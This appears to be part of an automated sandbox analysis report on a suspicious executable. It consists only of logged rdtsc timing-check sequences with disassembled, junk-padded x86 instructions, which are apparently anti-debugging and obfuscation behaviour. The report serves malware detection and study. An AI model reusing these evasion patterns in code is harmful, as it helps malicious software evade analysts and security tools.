                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4732CF second address: 473309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c ja 00007FE310CDC396h 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE310CDC3A4h 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 473309 second address: 47330F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4770A7 second address: 4770AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4770AB second address: 4770DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE311181222h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007FE31118122Fh 0x00000011 jmp 00007FE311181223h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 476D8D second address: 476DC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Dh 0x00000007 jng 00007FE310CDC396h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 push edi 0x00000011 jmp 00007FE310CDC3A1h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a jc 00007FE310CDC396h 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47E476 second address: 47E47B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47E47B second address: 47E481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47E481 second address: 47E491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jp 00007FE31118121Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 47E617 second address: 47E61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 485824 second address: 485841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jg 00007FE311181216h 0x0000000c popad 0x0000000d jmp 00007FE311181220h 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 484659 second address: 48466A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE310CDC39Ch 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 484933 second address: 484937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4247D3 second address: 4247D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 484A84 second address: 484AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE311181216h 0x0000000a popad 0x0000000b pushad 0x0000000c jng 00007FE311181216h 0x00000012 jl 00007FE311181216h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 48AD5B second address: 48AD7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A4h 0x00000007 pushad 0x00000008 je 00007FE310CDC396h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 48AD7A second address: 48AD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE31118121Bh 0x0000000e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 491272 second address: 491278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 491278 second address: 4912A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FE311181216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE31118121Dh 0x00000011 popad 0x00000012 pushad 0x00000013 jo 00007FE31118121Ah 0x00000019 push esi 0x0000001a pop esi 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4912A1 second address: 4912A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 4912A5 second address: 4912B8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE311181216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jno 00007FE311181216h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 49209B second address: 49209F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 49209F second address: 4920BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE31118121Bh 0x0000000d pushad 0x0000000e jo 00007FE311181216h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 492421 second address: 49243A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FE310CDC3A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 492D32 second address: 492D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 492D36 second address: 492D67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007FE310CDC3A7h 0x0000000f pop esi 0x00000010 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 498040 second address: 49805A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0929 second address: 52D092D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D092D second address: 52D0933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0933 second address: 52D0944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0944 second address: 52D0981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE311181227h 0x0000000a or ecx, 4DCB694Eh 0x00000010 jmp 00007FE311181229h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0981 second address: 52D0991 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC39Ch 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0991 second address: 52D0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D06BF second address: 52D06F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FE310CDC3A6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE310CDC39Eh 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D06F6 second address: 52D06FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D06FC second address: 52D0700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0700 second address: 52D0704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0704 second address: 52D072E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE310CDC3A9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D072E second address: 52D0732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0732 second address: 52D0738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0738 second address: 52D073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D073E second address: 52D0742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0C97 second address: 52D0C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0C9C second address: 52D0D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FE310CDC39Eh 0x00000010 mov ch, 6Ah 0x00000012 pop edx 0x00000013 pushfd 0x00000014 jmp 00007FE310CDC39Ch 0x00000019 adc cx, 92D8h 0x0000001e jmp 00007FE310CDC39Bh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FE310CDC39Fh 0x0000002d or ah, FFFFFF9Eh 0x00000030 jmp 00007FE310CDC3A9h 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007FE310CDC3A0h 0x0000003c adc ax, D798h 0x00000041 jmp 00007FE310CDC39Bh 0x00000046 popfd 0x00000047 popad 0x00000048 xchg eax, ebp 0x00000049 pushad 0x0000004a mov edx, ecx 0x0000004c mov bl, ch 0x0000004e popad 0x0000004f mov ebp, esp 0x00000051 jmp 00007FE310CDC3A3h 0x00000056 mov eax, dword ptr [ebp+08h] 0x00000059 pushad 0x0000005a movzx eax, bx 0x0000005d call 00007FE310CDC3A1h 0x00000062 mov ah, 92h 0x00000064 pop edi 0x00000065 popad 0x00000066 and dword ptr [eax], 00000000h 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0D79 second address: 52D0D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0D7D second address: 52D0D92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0D92 second address: 52D0DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181221h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007FE311181223h 0x00000015 pop esi 0x00000016 call 00007FE311181229h 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52808AC second address: 5280922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bh, ch 0x0000000d call 00007FE310CDC3A9h 0x00000012 jmp 00007FE310CDC3A0h 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FE310CDC3A0h 0x0000001f xchg eax, ebp 0x00000020 jmp 00007FE310CDC3A0h 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5280922 second address: 528093F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181229h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0CFA second address: 52C0D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FE310CDC39Eh 0x0000000c adc eax, 6B3D09E8h 0x00000012 jmp 00007FE310CDC39Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FE310CDC39Fh 0x00000023 and al, 0000002Eh 0x00000026 jmp 00007FE310CDC3A9h 0x0000002b popfd 0x0000002c call 00007FE310CDC3A0h 0x00000031 pushfd 0x00000032 jmp 00007FE310CDC3A2h 0x00000037 xor eax, 747F41D8h 0x0000003d jmp 00007FE310CDC39Bh 0x00000042 popfd 0x00000043 pop eax 0x00000044 popad 0x00000045 xchg eax, ebp 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push ecx 0x0000004a pop edx 0x0000004b mov al, 10h 0x0000004d popad 0x0000004e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0D93 second address: 52C0DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bx, cx 0x0000000f popad 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 call 00007FE311181221h 0x00000019 pop esi 0x0000001a pushfd 0x0000001b jmp 00007FE311181221h 0x00000020 xor si, 5C36h 0x00000025 jmp 00007FE311181221h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52C0DF4 second address: 52C0DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52D0B7E second address: 52D0B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0545 second address: 52A0555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC39Ch 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0555 second address: 52A0590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FE311181226h 0x00000011 push eax 0x00000012 jmp 00007FE31118121Bh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0590 second address: 52A0594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0594 second address: 52A05AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181227h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A05AF second address: 52A05E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 jmp 00007FE310CDC3A0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE310CDC3A7h 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A05E3 second address: 52A05E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A05E9 second address: 52A0600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE310CDC39Ah 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0600 second address: 52A0606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52A0606 second address: 52A060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260056 second address: 526005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526005A second address: 5260060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260060 second address: 5260128 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE31118121Ch 0x00000009 sub cx, B068h 0x0000000e jmp 00007FE31118121Bh 0x00000013 popfd 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007FE311181225h 0x00000020 xchg eax, ebp 0x00000021 jmp 00007FE31118121Eh 0x00000026 mov ebp, esp 0x00000028 jmp 00007FE311181220h 0x0000002d and esp, FFFFFFF8h 0x00000030 pushad 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 pushad 0x00000034 mov ax, B93Bh 0x00000038 movzx ecx, di 0x0000003b popad 0x0000003c push eax 0x0000003d pushad 0x0000003e movzx esi, di 0x00000041 pushfd 0x00000042 jmp 00007FE311181225h 0x00000047 jmp 00007FE31118121Bh 0x0000004c popfd 0x0000004d popad 0x0000004e xchg eax, ecx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007FE31118121Bh 0x00000058 or esi, 684E847Eh 0x0000005e jmp 00007FE311181229h 0x00000063 popfd 0x00000064 push eax 0x00000065 pop ebx 0x00000066 popad 0x00000067 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260128 second address: 526012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526012E second address: 526016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE31118121Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FE311181226h 0x00000011 push eax 0x00000012 jmp 00007FE31118121Bh 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 mov cl, C6h 0x0000001b pushad 0x0000001c mov eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526016F second address: 526018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebx, dword ptr [ebp+10h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE310CDC3A1h 0x00000012 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526018D second address: 5260193 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260193 second address: 52601BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC39Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FE310CDC3A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, cx 0x00000016 popad 0x00000017 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52601BC second address: 52601C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52601C2 second address: 52601C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52601C6 second address: 526022C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE311181227h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FE311181226h 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ch, dh 0x00000019 pushfd 0x0000001a jmp 00007FE311181226h 0x0000001f add esi, 6B92ECE8h 0x00000025 jmp 00007FE31118121Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526022C second address: 5260244 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE310CDC3A4h 0x00000009 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260244 second address: 5260248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 5260248 second address: 526028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FE310CDC3A9h 0x00000010 pop ecx 0x00000011 mov bx, 5054h 0x00000015 popad 0x00000016 mov dword ptr [esp], edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE310CDC3A6h 0x00000020 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 526028D second address: 52602D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 88B4h 0x00000007 jmp 00007FE31118121Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE31118121Ch 0x00000018 xor si, 5668h 0x0000001d jmp 00007FE31118121Bh 0x00000022 popfd 0x00000023 mov eax, 4238145Fh 0x00000028 popad 0x00000029 je 00007FE383CAF560h 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeRDTSC instruction interceptor: First address: 52602D7 second address: 52602EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE310CDC3A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
